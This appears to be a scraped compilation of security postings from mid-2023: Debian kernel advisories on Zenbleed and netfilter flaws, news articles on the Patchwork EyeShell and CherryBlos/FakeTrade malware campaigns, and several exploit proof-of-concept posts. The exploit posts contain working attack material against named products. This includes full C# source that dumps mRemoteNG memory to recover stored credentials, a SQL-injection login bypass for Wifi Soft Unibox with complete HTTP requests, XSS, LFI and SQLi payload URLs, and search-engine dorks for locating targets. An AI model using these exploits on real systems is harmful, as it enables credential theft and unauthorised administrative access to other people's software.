Debian Linux Security Advisory 5462-1 - Tavis Ormandy discovered that under specific microarchitectural circumstances, a vector register in AMD "Zen 2" CPUs may not be written to 0 correctly. This flaw allows an attacker to leak sensitive information across concurrent processes, hyper threads and virtualized guests.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5462-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 30, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-20593

Tavis Ormandy discovered that under specific microarchitectural  
circumstances, a vector register in AMD "Zen 2" CPUs may not be  
written to 0 correctly.  This flaw allows an attacker to leak  
sensitive information across concurrent processes, hyper threads  
and virtualized guests.

For details please refer to  
<https://lock.cmpxchg8b.com/zenbleed.html> and  
<https://github.com/google/security-research/security/advisories/GHSA-v6wh-rxpg-cmm8>.

This issue can also be mitigated by a microcode update through the  
amd64-microcode package or a system firmware (BIOS/UEFI) update.  
However, the initial microcode release by AMD only provides  
updates for second generation EPYC CPUs.  Various Ryzen CPUs are  
also affected, but no updates are available yet.

For the stable distribution (bookworm), this problem has been fixed in  
version 6.1.38-2.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTGCyRfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Tjjw//SsbN4RnQHqV1G0XVWxApVK1DYoKw6+tHxkkf301jV2abDMcIO1keVNol  
gc2yENQyzeoGd++eBqO0MD9GnvrbutT6n7wChuyvB7bzFDQQA6hJHLcFLkKYA3D1  
6yFgczWL0Tx7wcrpKU9gVMWAe928VE4hJGVd6nFF02YS0GF8voY/ymiCqbuQA05f  
LOmeHNIWyzulBG0qNwQE6HT6s6LkLMCZAawpe3D85cE6exFWRDKJhxKY8GcZvJDV  
8G80Ik1xYAQ6Q5HqwxUr2Rp0sN7a8SghF817Sn/Bx6ahvej61ZTgDn7QhKLkGwu2  
/DOnMcKwKd9WB7gS9T4YLd6rNOPCL4J5P06ia4/JbocExIu19pEEfQvb7gf5PVl3  
994DykFy9ByKiXYh91U9QNyKaBZSjMFeN9Mg8FbbuwZGLLNACkhZc72JK4yKsxTq  
5cucuVBzwbwvvrK63h3YVDyOv8vRiI/jquxOMehsrSGOuaHpd2VduQdnS0ayKjqX  
STOKNRMA+GGjIoNdLyfe9HDlm3ztwsjrxoO0eXqWjUc7EA6KOfsF7NLFju2YXEt9  
80Yr6kCS5/IukkhZBAP4GwV4mLKG1yZ7vzwb15pAihvtw7UFrrzifkcL0yPf7Cx8  
wVtTUdl+5Y4Dfy+i9/LT0sY4fVEKfZZoXnDV733vxTTKKNQSpFk=  
=ceVi  
-----END PGP SIGNATURE-----

Debian Security Advisory 5462-1

Codecanyon Bitcoin Tools Suite version 1.0 suffers from a local file inclusion vulnerability.

    ========================================================================================================| # Title     : Codecanyon Bitcoin Tools Suite v1.0 LFI Vulnerability                                  || # Author    : indoushka                                                                              || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                | | # Vendor    : http://nitrogfx.com/74316-codecanyon-bitcoin-tools-suite-v10-50-features-20003097.html |  | # Dork      : "Powerful bitcoin and cryptocurrency tools & tickers."                                 |========================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected file : index.php    line 4 : require_once('includes/templates/' . $website['template'] . '/header.php');[+] http://localhost/btcon/index.php?website['template'] = evilGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Codecanyon Bitcoin Tools Suite 1.0 Local File Inclusion

CMVC SHOP LMS version 2.1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CMVC SHOP LMS v 2.1.0 Sql injection Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit)                                               | | # Vendor    : http://www.cmvcshop.com/                                                                                           |  | # Dork      : All rights reserved CMVC SHOP                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : product_detail.php?productid=%Inject_Here%106[+] http://127.0.0.1/cmvcshopcom/product_detail.php?productid=%Inject_Here%106[+] http://127.0.0.1/wwwcmvcshopcom/login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMVC SHOP LMS 2.1.0 SQL Injection

mRemoteNG version 1.77.3.1784-NB exploit that extracts sensitive information that is stored in memory in the clear but encrypted at rest.

    # Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory# Google Dork: -# Date: 21.07.2023# Exploit Author: Maximilian Barz# Vendor Homepage: https://mremoteng.org/# Software Link: https://mremoteng.org/download# Version: mRemoteNG <= v1.77.3.1784-NB# Tested on: Windows 11# CVE : CVE-2023-30367/*Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users tostore and manage multi-protocol connection configurations to remotely connect to systems.mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-devloads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,even if no connection has been established yet. This allows attackers to access contents of configuration files in plain textthrough a memory dump and thus compromise user credentials when no custom password encryption key has been set.This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper*/using System;using System.Collections;using System.Collections.Generic;using System.Diagnostics;using System.IO;using System.Reflection;using System.Runtime.InteropServices;using System.Text;using System.Text.RegularExpressions;namespace mRemoteNGDumper{public static class Program{public enum MINIDUMP_TYPE{MiniDumpWithFullMemory = 0x00000002}[StructLayout(LayoutKind.Sequential, Pack = 4)]public struct MINIDUMP_EXCEPTION_INFORMATION{public uint ThreadId;public IntPtr ExceptionPointers;public int ClientPointers;}[DllImport("kernel32.dll")]static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);[DllImport("Dbghelp.dll")]static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);static void Main(string[] args){string input;bool configfound = false;StringBuilder filesb;StringBuilder linesb;List<string> configs = new List<string>();Process[] localByName = Process.GetProcessesByName("mRemoteNG");if (localByName.Length == 0) {Console.WriteLine("[-] No mRemoteNG process was found. Exiting");System.Environment.Exit(1);}string assemblyPath = Assembly.GetEntryAssembly().Location;Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp";FileStream procdumpFileStream = File.Create(dumpFileName);MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();// A full memory dump is necessary in the case of a managed application, other wise no information// regarding the managed code will be availableMINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);procdumpFileStream.Close();filesb = new StringBuilder();Console.WriteLine("[+] Searching for configuration files in memory dump.");using (StreamReader reader = new StreamReader(dumpFileName)){while (reader.Peek() >= 0){input = reader.ReadLine();string pattern = @"(\<Node)(.*)(?=\/>)\/>";Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);if (m.Success){configfound = true;foreach (string config in m.Value.Split('>')){configs.Add(config);}}}reader.Close();if (configfound){string currentDir = System.IO.Directory.GetCurrentDirectory();string dumpdir = currentDir + "/dump";if (!Directory.Exists(dumpdir)){Directory.CreateDirectory(dumpdir);}string savefilepath;for (int i =0; i < configs.Count;i++){if (!string.IsNullOrEmpty(configs[i])){savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml";Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);using (StreamWriter writer = new StreamWriter(savefilepath)){writer.Write(configs[i]+'>');writer.Close();}}}Console.WriteLine("[+] Done!");Console.WriteLine("[+] Deleting memorydump file!");File.Delete(dumpFileName);Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \""+ currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"" );}else{Console.WriteLine("[-] No configuration file found in memorydump. Exiting");Console.WriteLine("[+] Deleting memorydump file!");File.Delete(dumpFileName);}}}}}

mRemoteNG 1.77.3.1784-NB Sensitive Information Extraction

Debian Linux Security Advisory 5461-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5461-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 30, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-3390 CVE-2023-3610 CVE-2023-20593

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-3390

    A use-after-free flaw in the netfilter subsystem caused by incorrect  
    error path handling may result in denial of service or privilege  
    escalation.

CVE-2023-3610

    A use-after-free flaw in the netfilter subsystem caused by incorrect  
    refcount handling on the table and chain destroy path may result in  
    denial of service or privilege escalation.

CVE-2023-20593

    Tavis Ormandy discovered that under specific microarchitectural  
    circumstances, a vector register in AMD "Zen 2" CPUs may not be  
    written to 0 correctly.  This flaw allows an attacker to leak  
    sensitive information across concurrent processes, hyper threads  
    and virtualized guests.

    For details please refer to  
    <https://lock.cmpxchg8b.com/zenbleed.html> and  
    <https://github.com/google/security-research/security/advisories/GHSA-v6wh-rxpg-cmm8>.

    This issue can also be mitigated by a microcode update through the  
    amd64-microcode package or a system firmware (BIOS/UEFI) update.  
    However, the initial microcode release by AMD only provides  
    updates for second generation EPYC CPUs.  Various Ryzen CPUs are  
    also affected, but no updates are available yet.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.10.179-3.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTGCxhfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q2Lw//W7eGT2uTxzgwGK1ivLNtzu4VnZfX3luCzLc2Gy49YhSTPfepMsR+EZWU  
zMfxMwXp7HcgUUAj6VnKPSYt0lmauDVy9POUl20nOzM8hFScemhFJ+DVSeeJrfhR  
RPUroaJNLpJS1QjYJisi2tjKnoc8IhCkw/X88I4S4dAzekmRTLeEdeAIP0jyRYDi  
Pd+nW8vR2bcMG4jAaA/lBu17FgysEpHMleMzr9Ocw7k6eqlcIo12w36Ml51MmXZW  
Lxr7XKrAM6p9TuL+BY0i4FvW0f7hvbpMdhIaAzUf+7LQj9Tn5rGNaHB+NhLO6HB1  
spOXfZLVCM10LDCDIUR3lz0hUNI/10bKtoarbvoygevVzuvGWLTmI5P/uei9Bv1m  
jqd+FOtkZuYsuQzvzIrVISGL2ltpD3055mBaOJWIBrDl+mrR88m+LAMA5iJiCuvh  
M6rfJgraQFHeMFJi1ojDgNyyRaasxOKXRcWAYOvgZ1XKLfJ10OkieYq5CO1c7iKW  
4NkwBklDP8wEHoZHMEY3KnLnGcNO93wBBGcQVIBlMXu0IKlf/BT0Rcj0ynz5g5N1  
MgvGAJio+yTr4QWRz/GQRtF3Lf5r4Ezib/Y2Qv9PUbVWzmmiUyQsATjcp9d+sLSB  
hJhR9+9d4DefRAPGFOSCA6d01qL8HygsvKyyGB4C1DdbSlT3APc=  
=3UcB  
-----END PGP SIGNATURE-----

Debian Security Advisory 5461-1

CMSshop version 1 suffers from a cross site scripting vulnerability.

**CMSshop 1 Cross Site Scripting**

Posted Jul 31, 2023

Authored by indoushka

CMSshop version 1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 987e4a7e0d2984ae1bf6c18eb68c0343d8d4d8903869ab00d311e71710917c70

Download | Favorite | View

**CMSshop 1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : CMSshop(ir) v1 XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/item/pro-login-advanced-secure-php-user-management-system/12388905?s_rank=169               || # Dork      : "Login - ProLogin"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /shop-php/cart.php?new=28%22%20onmouseover%3dprompt(904251)%20bad%3d%22                   /shop-php/product.php?productid=20&start=0%22%20onmouseover%3dprompt(961299)%20bad%3d%22            [+] http://localhost/shop-php/cart.php?new=21%22%20%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,806)
*   Arbitrary (16,170)
*   BBS (2,859)
*   Bypass (1,736)
*   CGI (1,026)
*   Code Execution (7,254)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,336)
*   DoS (23,386)
*   Encryption (2,366)
*   Exploit (51,705)
*   File Inclusion (4,218)
*   File Upload (969)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (891)
*   Java (3,038)
*   JavaScript (853)
*   Kernel (6,658)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,587)
*   Python (1,531)
*   Remote (30,698)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,879)
*   Shell (3,177)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,329)
*   TCP (2,399)
*   Trojan (687)
*   UDP (886)
*   Virus (664)
*   Vulnerability (31,731)
*   Web (9,628)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,889)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,301)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,624)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,782)
*   UNIX (9,272)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CMSshop 1 Cross Site Scripting

CMSninesol version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMSninesol v1.0 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.ninesol.com                                                                                            |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/comwaveedupk/download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMSninesol 1.0 Cross Site Scripting

Wifi Soft Unibox Administration 3.0 and 3.1 is vulnerable to SQL Injection. The vulnerability occurs because of not validating or sanitizing the user input in the username field of the login page.

    # Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"# Date: 07/2023# Exploit Author: Ansh Jain @sudoark# Author  Contact : arkinux01@gmail.com# Vendor Homepage: https://www.wifi-soft.com/# Software Link:https://www.wifi-soft.com/products/unibox-hotspot-controller.php# Version: Unibox Administration 3.0 & 3.1# Tested on: Microsoft Windows 11# CVE : CVE-2023-34635# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable toSQL Injection, which can lead to unauthorised admin access for attackers.The vulnerability occurs because of not validating or sanitising the userinput in the username field of the login page and directly sending theinput to the backend server and database.## How to ReproduceStep 1 : Visit the login page and check the version, whether it is 3.0,3.1, or not.Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field andenter any random password.Step 3 : Fill in the captcha and hit login. After hitting login, you havebeen successfully logged in as an administrator and can see anyone's userdata, modify data, revoke access, etc.--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Request-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameters: username, password, captcha, action-----------------------------------------------------------------------------------------------------------------------POST /index.php HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 83Origin: https://255.255.255.255.host.comReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersusername='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 302 FoundServer: nginxDate: Tue, 18 Jul 2023 13:32:14 GMTContent-Type: text/html; charset=UTF-8Location: ./dashboard/dashboardExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Request--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------GET /dashboard/dashboard HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 200 OKServer: nginxDate: Tue, 18 Jul 2023 13:32:43 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheCache_control: private<!DOCTYPE html><html lang="en">html content</html>

CVE-2023-34635: Wifi Soft Unibox Administration 3.0

Threat actors associated with the hacking crew known as Patchwork have been spotted targeting universities and research organizations in China as part of a recently observed campaign.
The activity, according to KnownSec 404 Team, entailed the use of a backdoor codenamed EyeShell.
Patchwork, also known by the names Operation Hangover and Zinc Emerson, is suspected to be a threat group that

Cyber Espionage / Malware

Threat actors associated with the hacking crew known as Patchwork have been spotted targeting universities and research organizations in China as part of a recently observed campaign.

The activity, according to KnownSec 404 Team, entailed the use of a backdoor codenamed **EyeShell**.

Patchwork, also known by the names Operation Hangover and Zinc Emerson, is suspected to be a threat group that operates on behalf of India. Active since at least December 2015, attack chains mounted by the group have a narrow focus and tend to single out Pakistan and China with custom implants such as BADNEWS via spear-phishing and watering hole attacks.

The adversarial collective has been found to share tactical overlaps with other cyber-espionage groups with an Indian connection, including SideWinder and the DoNot Team.

Earlier this May, Meta disclosed that it took down 50 accounts on Facebook and Instagram operated by Patchwork, which took advantage of rogue messaging apps uploaded to the Google Play Store to collect data from victims in Pakistan, India, Bangladesh, Sri Lanka, Tibet, and China.

"Patchwork relied on a range of elaborate fictitious personas to socially engineer people into clicking on malicious links and downloading malicious apps," the social media giant said.

"These apps contained relatively basic malicious functionality with the access to user data solely reliant on legitimate app permissions granted by the end user. Notably, Patchwork created a fake review website for chat apps where they listed the top five communication apps, putting their own, attacker-controlled app at the top of the list."

Some of its activities have also been reported under the name ModifiedElephant, according to Secureworks, referring to a set of attacks against human rights activists, academics, and lawyers across India to conduct long-term surveillance and plant "incriminating digital evidence" in connection with the 2018 Bhima Koregaon violence in the Indian state of Maharashtra.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

EyeShell, detected alongside BADNEWS, is a a .NET-based modular backdoor that comes with capabilities to establish contact with a remote command-and-control (C2) server and execute commands to enumerate files and directories, downloading and uploading files to and from the host, execute a specified file, delete files, and capture screenshots.

The findings come as the cybersecurity company also detailed another wave of phishing attacks orchestrated by a group called Bitter aimed at aerospace, military, large enterprises, national government affairs, and universities in the country with a new backdoor known as ORPCBackdoor.

The South Asian threat actor was previously detected targeting the nuclear energy industry in China with malware downloaders delivered via CHM and Microsoft Excel Files that are designed to create persistence and retrieve further payloads.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Patchwork Hackers Target Chinese Research Organizations Using EyeShell Backdoor

By Deeba Ahmed
Dubbed CherryBlos and FakeTrade by researchers, these two malware campaigns have been identified as potentially related by Trend Micro.
This is a post from HackRead.com Read the original post: FakeTrade Android Malware Attack Steals Crypto Wallet Data

**IN SUMMARY**

*   **The malware campaigns have been dubbed CherryBlos and FakeTrade.**
*   **The prime target of this attack is crypto wallet data on Android devices.**
*   **TikTok, Twitter and Telegram are being used to promote malicious apps.**

A new malware campaign is currently focusing its sights on Android devices, aiming to surreptitiously steal personal information and cryptocurrency wallet credentials from unsuspecting users.

According to the latest report by Trend Micro, cybersecurity researchers have detected two financially motivated malware campaigns. These malicious operations exploit applications within the official Google Play Store, making the platform an attractive target for such cybercriminal campaigns.

Dubbed CherryBlos and FakeTrade by researchers, these two malware campaigns have been identified as potentially related by Trend Micro. The link between them lies in the fact that both types of malware utilize identical application certificates and network infrastructure.

Researchers have identified that campaign operators are increasingly targeting Android users with banking trojans to steal cryptocurrency. To achieve their malicious objectives, they distribute fake Android applications loaded with malware. These apps are advertised on the Google Play Store, phishing websites, and social media platforms. The same pattern is identified in the latest campaigns.

It is worth noting that the malware operators are exploiting various social networking platforms, including X (formerly Twitter), TikTok, and Telegram, to promote fraudulent Android apps. All of the offensive apps have been removed from Google Play.

Fake TikTok and (X) Twitter account dropping malicious apps (Screenshots credit: Trend Micro)

**CherryBlos Campaign**

The CherryBIos campaign exploits social network sites to promote fake services and ads, leading users to phishing websites. Unsuspecting individuals are deceived into downloading and installing Android apps infected with malware from these sites.

The malware, known as CherryBIos, first appeared online in April 2023. It earned its name from the unique string found in its hijacking framework. Once installed, CherryBIos can pilfer cryptocurrency wallet credentials and alter a user’s address, diverting funds to the attackers’ address during withdrawals.

“Upon further investigation, we were able to trace its source to a telegram group called Ukraine ROBOT that had been posting messages related to cryptocurrency mining since early 2023. This group’s profile directly points to the phishing website where the malware was downloaded,” Trend Micro’s report read.

Later, the malware was found in Happy Miner, GPTalk, and SynthNet apps. An interesting feature of CherryBIos malware is that it exploits OCR (optical character recognition) to read mnemonic phrases found in images on a compromised device and send the data to a C2 server.

These phrases are specifically helpful when users want to restore a crypto wallet. It is a notorious Android banking trojan that first requests Android accessibility permissions to perform malicious activities. These permissions are designed for people with disabilities and help them interact with the device via gestures and perform tasks like reading screen content aloud or automating repetitive tasks.

**FakeTrade Campaign**

In the FakeTrade campaign, malware operators use numerous fake money-earning apps that appear to be e-commerce platforms, promising increased income through referrals and top-ups. The malware (AndroidOS FakeTrade.HRXB), hidden inside the apps, prevents users from withdrawing funds.

Researchers found approximately 31 fake Android apps distributing the FakeTrade malware, most of which were designed for shopping or persuading users to complete various tasks in order to earn money or purchase app credits to top up their accounts. However, those who fell for this trap were unable to withdraw funds when they attempted to do so. Most of the apps were uploaded to Google Play in 2021, with some appearing in 2022.

Researchers suspect that the threat actors behind these campaigns aren’t targeting any specific region, considering the languages used in their analyzed samples. This means their victims could be dispersed worldwide, as attackers can conveniently replace resource strings and upload these fake apps to different Google Play regions such as Vietnam, Mexico, Indonesia, the Philippines, and Uganda.

1.  Triada Malware Infects Android Devices via Fake Telegram App
2.  Google Removes Swing VPN Android App Exposed as DDoS Botnet
3.  Iranian Stalkerware ‘Spyhide’ Steals Data from 60K Android Devices
4.  Popular Android Screen Recorder iRecorder App Revealed as Trojan
5.  Global Malware Attack Imitates VPN, Security Apps on Android Phones

Tag

#google